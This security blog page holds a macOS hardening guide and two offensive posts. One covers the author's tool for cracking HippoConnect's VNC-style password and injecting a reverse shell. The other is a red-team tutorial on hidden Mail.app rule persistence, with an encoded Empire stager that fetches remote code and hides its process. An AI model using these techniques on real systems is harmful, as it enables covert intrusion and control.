Category: OSX

Securing a default installation of MacOS

 

This was originally written as the basis for a GIAC Gold paper.  Ultimately, it was not unique enough to warrant a research paper, but will provide an overview of the security features of MacOS.

 

As of mid 2016, MacOS captures nearly 10% of the global market for desktop PC software.  While Apple computers have long had the reputation of being more secure than the more popular Windows operating system, they are also susceptible to many of the same attack vectors.  While MacOS comes built in with a number of strong security features, users of MacOS can take steps to improve the security of their device through a number of configuration changes as well utilization of security software.  In this post we will explain some of the security features built into MacOS and how to configure them properly, as well as provide information about additional software that can improve the security posture of the system.

1.   Introduction

Security of endpoint workstations is essential.  Threats can include remote exploits against running services, malware infections via the web or through email, or physical attacks against against the system.  By securing workstations we can reduce the likelihood that sensitive data can obtained by unauthorized third parties, and save time from not having to eradicate malware, restore from system backups, or having to reinstall operating systems and applications (NIST, 2016).

There are a wide variety of threats that exist against a system running MacOS.  The first is local threats.  Local threats require physical access to the system.  Aside from physical controls, software based controls can be used to mitigate these attacks.  Utilizing firmware passwords as well as encryption of the hard drive can prevent access to the data even if the hard drive is removed from the system.  Physical attackers could also exploit a workstation if it is left unattended and unlocked.  Passwords should be used to authenticate to a workstation and the password should be strong (NIST, 2016).

Remote threats attack services that are running on the system.  Services that do not require authentication or fail to use encryption are desirable targets for attackers.  This can be mitigated by removing unused or vulnerable services and staying up to date on security patches.  Using a firewall can also reduce the attack surface rendering vulnerable services inaccessible to a remote attacker (NIST, 2016).

Malicious payloads can find their way onto a system through a number of different vectors, to include web browsing, email, and removable media.  But utilizing low privileged accounts for daily use, we can reduce the dame from a malware infection.  Anti-virus can quarantine known malicious payloads before they are given the opportunity to execute (NIST, 2016).

This paper provides information on securing an installation of MacOS.  By implementing these recommendations users will be able to better secure their systems and the systems within their respective organizations. While each environment will have unique requirements, this should serve as a guideline.  Some of these suggestions may remove functionality that may be desired or required.  The acceptable tradeoff between security and functionality are to be determined by the reader.

2.   Built-in Security Controls

2.1.      Software Updates

With the release of MacOS Sierra Apple brought in a number of new security updates.  Apple helps users keep up to date with the latest software by sending notifications whenever new updates are available, and can be downloaded with a click of a button.  This helps users quickly their software up to the latest version.

To configure the App sore to check for updates automatically, go to System Preferences, click on App Store, and ensure that “Automatically check for updates” is selected.

It is important to patch quickly. After a vulnerability is discovered, it is usually patched quickly, but this does no good if the patch is applied. It doesn’t take much time until after a patch is released that public exploits become available (Levin, 2016).

2.2.      Gatekeeper

Gatekeeper was first introduced in OS X Lion and used to enforce code signing, which reduces the likelihood of an application containing malware.  By default, MacOS will only run applications downloaded from the Mac App Store and applications which are signed with a valid developer ID.  It can also be configured to only allow applications from the App Store, or alternatively to allow unsigned applications (NIST, 2016).

2.3.      XProtect

Apple’s anti-malware protection is known as X-Protect.  It first became available in OS X Snow leopard. When an application is downloaded from a quarantine aware application such as a web browser or an instant messenger.  It works by comparing an application against any known malware signatures.  The definitions are silently updated and enabled by default. When you an application is downloaded a quarantine bit it set, and the quarantine is compared against a list of malware definitions in System/Library/Core Services/CoreTypes.bundle/Contents/Resources/XProtect.plist.  If there is a match, you will receive a warning message.  XProtect doesn’t contain any advanced heuristics, but it should be left on as it protects against common strains of malware (Hoffman, 2015).

2.4.      FileVault

MacOS also comes with an encryption utility called FileVault. Since OS X Lion, the utility allows for full disk encryption. It can also be used to encrypt removable drives as well as Time Machine back-ups.

FileVault has no noticeable effect on performance.  If the device is ever compromised, it renders the data on the system inaccessible.  Apple explains this in their FileVault Best Practices whitepaper, “All computers have firmware of some type—EFI, BIOS—to help in the discovery of hardware components and ultimately to properly bootstrap the computer using the desired OS instance. In the case of Apple hardware and the use of EFI, Apple stores relevant information within EFI to aid in the functionality of OS X. For example, the FileVault key is stored in EFI to transparently come out of standby mode.” (Apple, 2012)

It is possible that the decryption key could be recovered if the system is left on in standby mode.  During standby, the key resides in memory and if the RAM was dumped the key could be extracted. The key can be destroyed during standby to mitigate this attack vector. One option is to enforce hibernation which will evict the FileVault keys from memory.  You can also remove them in standby mode using the pmset utility via the following command:

pmset destroyfvkeyonstandby 1

2.5.      Firewall

MacOS also comes with a built in firewall.  By default, it is not enabled.  MacOS does not come configured with many listening services.  With the firewall enabled, users have the ability to block all incoming connections, or configure incoming connections on a per app basis.  By default, signed applications will be able to receive incoming connections.  There is also the option for “stealth mode”, which ignores ICMP packets and will not provide a response (Hoffman, 2014).  It is recommended to block incoming connections unless there is a service running on the system that requires it.

2.6.      Keychain

MacOS also has built in features for password management.  The primary way MacOS manages passwords is through the Keychain. The keychain is an app that can store passwords as well as account information.  The keychain can also be used to manage certificates that are used to validate websites, digital documents, and other web-based material (Apple, 2016).  The keychain is typically set the same as the login password, but can also be set to a different password. To reduce the likelihood of having the keychain password compromised, it should be set to something other than your logon password.  By default, the keychain will not lock when your computer goes to sleep. You can use the Keychain Access Utility to enable the keychain to lock when sleeping and to lock after a certain number of minutes (NIST, 2016).

2.7.      Sandboxing

Apple has enforced sandboxing on applications that come from the Mac app store.  This helps mitigate the effects of software flaws within apps that could compromise the host system.  While this reduces the functionality of certain apps, (Martin, 2011) it offers tremendous security gains.  It is also possible to force any application to run in a sandbox using the sandbox-exec tool. (Prandzioch, 2016) To use sandboxing on applications other than those on the App store, I recommend using https://github.com/pansen/macos-sandbox-profiles.  While sandboxing is not always 100& effective, (Core Security, 2011) it can reduce the harm from an exploited application.

2.8.      System Integrity Protection

Another security feature that first came to Mac with OS X El Capitan is SIP (System Integrity Protection).  SIP, sometimes referred to as “rootless” can help prevent against potentially malicious software from modifying protected files. Basically what it does is it restricts the permissions of the root user account.  With this in place, only processes signed by Apple can modify these protected areas.  There are not many good reasons to disable SIP and it is highly recommended to leave this on (Apple, 2016).

3.   Configuration

3.1.      User Account Management

MacOS allows for users to automatically login during start-up.  This should not be used.  If you enable automatic login, the keychain password is stored in /etc/kcpassword XOR’d with a known key, allowing anyone which access to the machine to recover the password plaintext (StackExchange, 2012).

When receiving a fresh installation of MacOS, the first user account created is an administrative user account.  Administrative users are members of the admin group and have sudo permissions enabling them to control other user accounts to include that of root.   Apple recommends the following when creating user accounts, “to reduce exposure to harmful apps or files, limit the number of administrator users you create. Consider creating a standard user for your daily work and use the administrator user only when you need to install software or administer users.” (Apple, 2016)

Apple also allows users to create a guest user.  The inclusion of the guest user is so that friends and family can use the system without a password, without gaining access to the files of the owner.  This can be helpful to many, however it creates a certain level of risk.  If there exists a local privilege escalation exploit against MacOS that has not been patched, it may be able to be exploited via the guest user account.  Unless explicitly needed, for this reason the guest account should be disabled. (NIST, 2016)

3.2.      Firmware Password

Enabling firmware passwords can increase the security level of an MacOS system.  Firmware passwords are set on the actual logicboard’s firmware.  It is an EFI password that can keep the Mac from being booted from an external boot volume or into single user mode.  In the past, firmware passwords could usually be bypassed by removing the memory, but here this is not the case (Tanasi, 2017).  The firmware can also prevent direct memory access via interfaces like FireWire.  The firmware password stays with the host system so removing the drive and bringing it to another system would not remove the password (Apple, 2012).  While this is a strong control, it is not completely immune from all attacks.  In 2016 a security researcher discovered a way to bypass some implementations by re-flashing the chip (osxreverser , 2016).  This does not recover the password, but would still grant access.  The only way approved way to remove the firmware password without knowing it is by taking the system to an Apple retail store or an Apple authorized service provider (Apple, 2016).

3.3.      Bonjour

Bonjour is the name for Apple’s implementation of zero configuration networking. It is used for service discovery, address assignment, and hostname resolution. Because bonjour advertises all the system’s capabilities, it provides information to attackers about what type of software is running on the system (Tanasi, 2016). A whitepaper presented during the 2016 IEEE Symposium on security and privacy, a group of researchers identify a number of apple services that use zero configuration frameworks that present a lack of security in their implementation, such as Apple Handoff and Airdrop. Because the zero configuration protocol has no means to validate identity, and service relying on it is vulnerable to MITM (Man in the Middle) attacks. This would allow an attacker on the same network segment to intercept files being transferred (Bai, 2016).

3.4.      Disable sharing

On a new MacOS system, all sharing is disabled by default. This is the most secure state.  If sharing is necessary, certain precautions should be taken into consideration.

3.4.1.   Screen Sharing and Remote Management

These two services allow remote control of the system similar to to popular screen sharing applications based upon VNC.  The only time this would be needed typically is in regards to remote support.  If this is needed, ensure that authentication is used with a strong password.  Disable when not in use (NIST, 2016).

3.4.2.   Remote Login

Remote login controls access to both SSH and SFTP. The protocols themselves are relatively secure, but unless needed, they should remain disabled.  For additional security SSH can be configured to only allow key based authentication by editing /etc/ssh_config and setting the following values: (stackexchange, 2017)

PermitRootLogin no

PasswordAuthentication no

PermitEmptyPasswords no

ChallengeResponseAuthentication no

 

References

American Psychological Association. (2010). APA Manual (Publication manual of the American Psychological Association) (6th ed.). Washington, DC: American Psychological Association.

Citefast, Citefast automatically formats citations: APA 6th edition, MLA 7th ed. and Chicago 16th ed. (n.d.). Retrieved July 29, 2014, from http://www.citefast.com/

Strunk, W., & White, E. B. (1999). The elements of style. Boston: Allyn and Bacon.

About System Integrity Protection on your Mac. (2016, November 07). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204899

Osxreverser. (2016, June 25). Apple EFI firmware passwords and the SCBO myth. Retrieved January 14, 2017, from https://reverse.put.as/2016/06/25/apple-efi-firmware-passwords-and-the-scbo-myth/

Apple OS X Sandbox Predefined Profiles Bypass. (2011, November 10). Retrieved January 14, 2017, from https://www.coresecurity.com/content/apple-osx-sandbox-bypass

Atlas, K. (2016, October 06). OS X Config Check. Retrieved January 14, 2017, from https://github.com/kristovatlas/osx-config-check

Badger, L., Souppaya, M., Trapnell, M., Trapnell, E., Yaga, D., & Scarfone, K. (2016). Guide to securing Apple OS X 10.10 systems for IT professionals: a NIST security configuration checklist. NIST Special Publication (SP) 800 -179. doi:10.6028/nist.sp.800-179

Bai, X., Xing, L., Zhang, N., Wang, X., Liao, X., Li, T., & Hu, S. (2016). Staying Secure and Unprepared: Understanding and Mitigating the Security Risks of Apple ZeroConf. 2016 IEEE Symposium on Security and Privacy (SP). doi:10.1109/sp.2016.45

Best Practices for Deploying FileVault 2. (2012). Apple Technical White Paper. Retrieved January 14, 2017, from http://training.apple.com/pdf/WP_FileVault2.pdf

Bookwalter, J. (2016, November 22). Radio Silence 2 review: Set it and forget it Mac firewall for outgoing connections. Retrieved January 14, 2017, from http://www.macworld.com/article/3143072/security/radio-silence-2-review-set-it-and-forget-it-mac-firewall-for-outgoing-connections.html

Desktop OS market share 2012-2016. (n.d.). Retrieved January 14, 2017, from https://www.statista.com/statistics/218089/global-market-share-of-windows-7/

Does activating auto-login compromise secure password storage? (2012, May 7). Retrieved January 14, 2017, from http://apple.stackexchange.com/questions/50652/does-activating-auto-login-compromise-secure-password-storage

Hands Off! (n.d.). Retrieved January 14, 2017, from https://www.oneperiodic.com/products/handsoff/

Hoffman, C. (2014, December 20). Your Mac’s Firewall is Off By Default: Do You Need to Enable It? Retrieved January 14, 2017, from http://www.howtogeek.com/205108/your-mac%E2%80%99s-firewall-is-off-by-default-do-you-need-to-enable-it/

Hoffman, C. (2015, May 18). XProtect Explained: How Your Mac’s Built-in Anti-malware Software Works. Retrieved January 14, 2017, from http://www.howtogeek.com/217043/xprotect-explained-how-your-macs-built-in-anti-malware-works/

How to use SSH keys and disable password authentication (2016, Jan 27). Retrieved January 22 2017, from http://apple.stackexchange.com/questions/225231/how-to-use-ssh-keys-and-disable-password-authentication

Kessler, T. (2014, December 17). The four Mac security options everyone should know. Retrieved January 14, 2017, from http://www.macworld.com/article/2855020/the-four-mac-security-options-everyone-should-know.html

Keychain Access: Keychain Access overview. (2016, May 4). Retrieved January 14, 2017, from https://support.apple.com/kb/PH20093?locale=en_US

Levin, J. (2016). MacOS and iOS Internals (Vol. 3, Security & Insecurity ). New York, NY: Technologeeks Press.

  1. (2017, January 02). MacOS Security and Privacy Guide. Retrieved January 14, 2017, from https://github.com/drduh/macOS-Security-and-Privacy-Guide

Martin, D. W. (2011, November 7). OS X Lion Sandboxing Is A Killjoy Destined To Ruin Our Mac Experience. Retrieved January 14, 2017, from http://www.cultofmac.com/113977/os-x-lion-sandboxing-is-a-killjoy-destined-to-ruin-our-mac-experience/

Norvell, P. (2002). Improving the Security of a Default Install of Mac OS X. SANS Institute InfoSec Reading Room. Retrieved January 14, 2017, from https://www.sans.org/reading-room/whitepapers/apple/improving-security-default-install-mac-os-v101-240.

Piper, S. (2016, September 11). OS X Lockdown. Retrieved January 14, 2017, from https://github.com/SummitRoute/osxlockdown

Prandzioch, D. (2016, April 11). OS X: Run any command in a sandbox. Retrieved January 14, 2017, from https://www.davd.eu/os-x-run-any-command-in-a-sandbox/

Set your Mac to automatically log in during startup. (2016, December 06). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT201476

Singh, S. (2013, August 30). Mac OSX-STIG. Retrieved January 14, 2017, from https://github.com/find-evil/Mac-OSX-STIG

Tanasi, A. (2016). MacOS 10.12 Sierra. Retrieved January 14, 2017, from http://docs.hardentheworld.org/OS/MacOS_10.12_Sierra/index.html

Use a firmware password on your Mac. (2016, March 22). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204455

Wardle, P. (2015). BlockBlock. Retrieved January 14, 2017, from https://objective-see.com/products/blockblock.html

Ways to avoid harmful software. (2016). Retrieved January 14, 2017, from https://help.apple.com/machelp/mac/10.12/index.html#/mh11389


Control your Mac with an iPhone app – An analysis of HippoRemote

 

 

 

 

 

 

 

Applications that are in use on Macs often times are under less scrutiny for security compared to their Windows alternatives.  When researching popular apps in use on OS X I found an app on the iPhone called HippoRemote.  It appears to be quite popular, with a combined 7,558 reviews on the iTunes store for both the LITE and Pro versions.  It has also been featured heavily on tech blogs such as Mashable, Lifehacker, Cult of Mac, Macworld, and many more.  What this software does is that it allows you to use your phone as a wireless trackpad and keyboard.  A cursory review of their website will show you that this is actually cross-platform, it is available for Mac, Windows, and Linux.  The Pro edition boasts various features such as a Login Manager that allows you to “Securely store your passwords and sign into websites with a single tap.”

Before going into the Mac version, I’m going to spend some time on the Windows version.  The software was downloaded from the website and the 7-zip self extracting archive utility was ran. The extracted application is called “HippoVNC” and by checking the about menu you can see that HippoVNC is forked off of UltraVNC.  For those of you who have been doing security a while, you may already be aware of some of the security concerns with VNC.  This first half of the article addresses those.

VNC typically will store the VNC password in either the registry or an .ini configuration file.  Since HippoVNC is based off of UltraVNC, it stores it in a config file.  This is important, because the confidentiality of this password is now dependent upon the NTFS permissions on the host.  In some cases this could be fine – however if the HippoVNC software was extracted into an area accessible to other users, the config file could be read by others.  The password in the config file is encrypted – but to little affect.  The password is only encrypted with DES – a weak and deprecated algorithm.  Even with encryption it is effectively plaintext, as the key by which all VNC passwords are encrypted is within the VNC source code.

{23, 82, 107, 6, 35, 78, 88, 7}

The other issues with VNC become more apparent when you analyze the packets on the wire.  Below is a screenshot when performing a “Follow TCP Stream” in Wireshark.

TCP stream of VNC authentication and keyboard commands

The authentication handshake is also using DES.  The keystrokes are visible in ASCII Hex.  Tools like Cain and Abel by oxid.it and PHoss by phenoelit.de, which have been around for quite some time – are able to sniff this handshake and crack it.

One of the tools for abusing the plaintext nature of VNC keystrokes is VNC keylogger by Jon Oberheide.  It allows you to see keystrokes sent in real time given the ability to sniff traffic between the client and server.  Keyboard emulating hardware such as the USB Rubber Ducky by Hak5 and similar products work by injecting keystrokes to perform action such as opening a command shell and executing a payload.  I thought to translate this concept over to VNC to inject keystrokes and spawn a shell. Further research showed that this idea had been explored before.  A metasploit module had been created last year for this very purpose.

Looking into the Linux documentation reveals that it works based off of your existing VNC server that comes with whichever version of Linux you are running.  There is no software available to download. With that said, it’s time to turn our attention to MacOS (OS X).

For OS X  Leopard (10.5) and Tiger (10.4) the instructions say to use Apple’s built in Screen Sharing utility, which is based upon VNC.  Apple Remote Desktop (ARD) is tremendous security improvement over other VNC variants. Version 2, which was released in 2004 encrypted all keyboard and mouse movement.  ARD version 3 encrypts all traffic including desktop graphics and file transfers.

The instructions for Leopard (10.6) and beyond recommend to download and run an app, called “HippoConnect.” It boasts additional features which are unavailable using the screen sharing method.  After downloading and running the application, the user sets a password up to eight characters and the set-up is complete.

I became interested in where the application stored the password as well as how to application would continue to run through reboots. To little surprise, they use the preferred method by Apple which is by using LaunchDeamons and LaunchAgents.  The information is stored in a .plist file, which is similar to XML.

HippoConnect .plist file contents

There are a couple alarming things here:

  • The password is stored in plain text as a program argument
  • The .plist file is word-readable
  • The program is executed with root privileges

The security implications are that if this was a multi-user system, any unprivileged account can find the password to remotely control the screen of any user, as the HippoConnectAgent is running on boot.  Any exploit of the HippoConnectAgent listener could result in gaining root privileges remotely.

Wireshark was used to evaluate how the HippoConnect protocol worked.  As it turns out, it was quite similar to VNC.

TCP Stream of HippoConnect

As you can see from the screenshot, It authenticates using VNC authentication by passing a value to be encrypted by the secret DES key.  The encrypted value is returned as the response.  Seeing this, I wanted to replicate the the attacks available against the VNC protocol for HippoConnect.

The first hiccup I ran into was trying to get the challenge to encrypt properly.  No matter how many times I tired encrypting the challenge with the key, I never got the proper response.  I looked at the RFC for The Remote Framebuffer Protocol (RFB) which states:

The client encrypts the challenge with DES, using a password supplied
   by the user as the key.  To form the key, the password is truncated
   to eight characters, or padded with null bytes on the right.  The
   client then sends the resulting 16-byte response.

As it were, this doesn’t tell the whole picture.  After some more research I stumbled across this post, which details the the missing information:

The actual software encrypts the challenge with all the bit fields 
in each byte of the password mirrored.

With this knowledge,  the VNC authentication handshake could now be replicated.

I wrote a python script, which I have dubbed “AngryHippo” which can be used for exploiting these security issues.

Here is a quick video of the sniffer module in use.  As you can see, the challenge and response values are printed to the screen, along with the status of the current keypress.

Sniffing Demo

Watch in HD https://vimeo.com/198123065

When you sniff the handshake, you can pass it to the cracking module to recover the plaintext key.  When running against the rockyou.txt wordlist, which has about 14 million words, I was able to exhaust the list in 5 minutes on my MacBook Pro.  If you require a complete brute force of the entire 8 character keyspace, I would suggest using one of the VNC crackers written in another programming language.  Below is a simple demonstration of the cracking module using a small wordlist.

Cracking Demo

Watch in HD https://vimeo.com/198123111

Lastly, I created a module for keystroke injection.  Currently the payload used is a simple bash reverse shell, in which you provide your listener’s IP and port for the reverse shell connection.  An option is available to control the speed of the commands.  This will likely be limited by the speed of the computer you are attacking.  Using a MacBook Pro as the target, The speed was set to one millisecond per keystroke. I was able to inject keystrokes to spawn a reverse shell in a fraction of a second.

Injection Demo (Fast)

Watch in HD https://vimeo.com/198002869

In case that demonstration moved too quickly, here is a slowed down version injecting at a tenth of a second per keystroke:

Injection Demo (Slow)

Watch in HD https://vimeo.com/198003039

If you are curious to see if anyone is running the HippoConnect agent on your network, it is broadcasted over multicast DNS via Bonjour, Apple’s zero-configuration protocol.  It listens on port 41660.

Bonjour Browser and Wireshark

AngryHippo can be downloaded at: https://github.com/n00py/AngryHippo


Using email for persistence on OS X

Mail Icon

In this post we will cover how we can use Mail.app on OS X to persist.  I was inspired by similar tools which are designed to work with Microsoft Outlook.  I first stumbled upon this article from MWR InfoSecurity, and then this blog post from Silent Break Security.  While rules in Mail.app will not replicate across the Directory Domain, which is one of the awesome things about both XRulez and Ruler, it does have some distinct advantages over other methods of persistence.

  • It does not present a network signature until remotely activated
  • It will not be detected by any tool which detects persistence such as KnockKnock.

It’s not uncommon for a target network to be under 24/7 monitoring.  Most methods of persistence will require the malware to constantly beacon out back to the Command and Control server.  This often times presents a unique network signature, which can discovered by a savvy analyst.  A security minded user or an organization may be enumerating common persistence areas for malware.  This typically includes LaunchDeamons, Cron Jobs, and Kernel Extensions.

KnockKnock

KnockKnock being ran on a system

While this technique will leave artifacts on the host, the fact that common security tools cannot detect it is a plus.

To create a mail rule the standard way, we would go to Mail -> Preferences -> Rules -> Add Rule

For the purpose of penetration testing, we cannot assume however that we will be able to interact within the GUI, and seek a way to perform this from a shell.

Mail rules are stored in:
/Users/$USER/Library/Mail/$VERSION/MailData/SyncedRules.plist
With the $USER being equal to the name of the users home directory, and $VERSION being equal to the version of the OS.  MacOS Sierra (10.12) will be V4, OS X El Capitan (10.11) will be V3, and anything from OS X Lion (10.7) to OS X Yosemite (10.10) will be V2.

If the user is using iCloud syncing, the mail rule will be overwritten by a different file, located at:
/Users/$USER/Library/Mobile Documents/com~apple~mail/Data/$VERSION/MailData/SyncedRules.plist
This file will always take precedence and overwrites the file in /Library/Mail/, and for this reason you should add your mail rule to this file instead.  While the iCloud syncing happens automatically, Mail.app will need to be bounced (restarted) for the application to pick up the new rule if the default location is in use.

There is another important caveat, and that is that mail rules will not be active, unless specified by RulesActiveState.plist which is present in the same directory.

Here is the anatomy of an acceptable rule for what we are trying to do:

<dict>
<key>AllCriteriaMustBeSatisfied</key>
<string>NO</string>
<key>AppleScript</key>
<string>EVIL.scpt</string>
<key>AutoResponseType</key>
<integer>0</integer>
<key>Criteria</key>
<array>
<dict>
<key>CriterionUniqueId</key>
<string>9709BE75-9606-D470-4F04-0A884724105A</string>
<key>Expression</key>
<string>TriggerWord</string>
<key>Header</key>
<string>Subject</string>
</dict>
</array>
<key>Deletes</key>
<string>YES</string>
<key>HighlightTextUsingColor</key>
<string>NO</string>
<key>MarkFlagged</key>
<string>NO</string>
<key>MarkRead</key>
<string>NO</string>
<key>NotifyUser</key>
<string>NO</string>
<key>RuleId</key>
<string>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</string>
<key>RuleName</key>
<string>Spam Filter</string>
<key>SendNotification</key>
<string>NO</string>
<key>ShouldCopyMessage</key>
<string>NO</string>
<key>ShouldTransferMessage</key>
<string>NO</string>
<key>TimeStamp</key>
<integer>147762204</integer>
<key>Version</key>
<integer>1</integer>
</dict>

The notable fields are:

  • AppleScript – This identifies that AppleScript should be ran, and the string identifies the payload
  • CriterionUniqueId and RuleId – Unique identifiers for the Rule.  The RuleID for this rule will need to be activated in RulesActiveState.plist
  • Expression – This is the string that our rule will look for when choosing to fire.
  • RuleName – This is the name of the rule.  To avoid detection, it should be named something innocuous.
  • Deletes – This deletes the email when the criteria is matched.

To activate the rule, just include the Rule ID in the RulesActiveState.plist file as such:

<key>0A08B01B-4DAF-FA3A-E81D-CBA86A0E7C84</key>
<true/>

Now that rule creating is covered it is time to talk about the payload.  Payloads are created in AppleScript.  Here is a sample payload:

do shell script "echo \"import sys,base64;exec(base64.b64decode('aW1wb3J0IHN5cztvPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bc3lzLnZlcnNpb25faW5mb1swXV0sZnJvbWxpc3Q9WydidWlsZF9vcGVuZXInXSkuYnVpbGRfb3BlbmVyKCk7VUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMC4xMC4xMC4xMDo4MDgwJzt0PScvYWRtaW4vZ2V0LnBocCc7by5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKSwgKCJDb29raWUiLCAic2Vzc2lvbj1ZODROTmF3cHd1VHN4ZEF0VVRsa0ZvWGc3b2c9IildO2E9by5vcGVuKHNlcnZlcit0KS5yZWFkKCk7SVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyd2JnRSXnJhNEZiM0hrWTkhXUp5LVdocWYlPDB4TjhLXyc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10NCmZvciBpIGluIHJhbmdlKDI1Nik6DQogICAgaj0oaitTW2ldK29yZChrZXlbaSVsZW4oa2V5KV0pKSUyNTYNCiAgICBTW2ldLFNbal09U1tqXSxTW2ldDQppPWo9MA0KZm9yIGNoYXIgaW4gZGF0YToNCiAgICBpPShpKzEpJTI1Ng0KICAgIGo9KGorU1tpXSklMjU2DQogICAgU1tpXSxTW2pdPVNbal0sU1tpXQ0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQ0KZXhlYygnJy5qb2luKG91dCkp'));\" 
| python & kill `ps -ax | grep ScriptMonitor |grep -v grep |  awk '{print $1}'`"

AppleScript can easily issue commands as you would in the terminal by using “do shell script“.  The second portion is a typical Empire stager.  The additional commands after the ampersand are to hide the AppleScript.  Without it, it leaves the AppleScript payload visible not only in the Activity Monitor, but also as an animated icon on the MenuBar. It appears as a spinning gear.

I’ve created an Empire module that you can use with Empire 2.0 to accomplish all of this automatically.  My original proof of concept script also exists to run manually in which you specify your own parameters and payload.  I highly recommend giving the Empire module a whirl.

Steps to use this module with Empire after gaining an initial session:

  • usemodule persistence/osx/mail (or wherever you placed the module)
  • Specify Listener, Trigger Word, and RuleName
  • Execute

When you want to execute the payload at a later time all you have to do is:

  • Have your Empire server listening
  • Send an email to the target, specifying the trigger word in the subject line

The email will be deleted and never delivered to the inbox, and python will spawn a process which will pull down the stager from your Empire server.

 

-n00py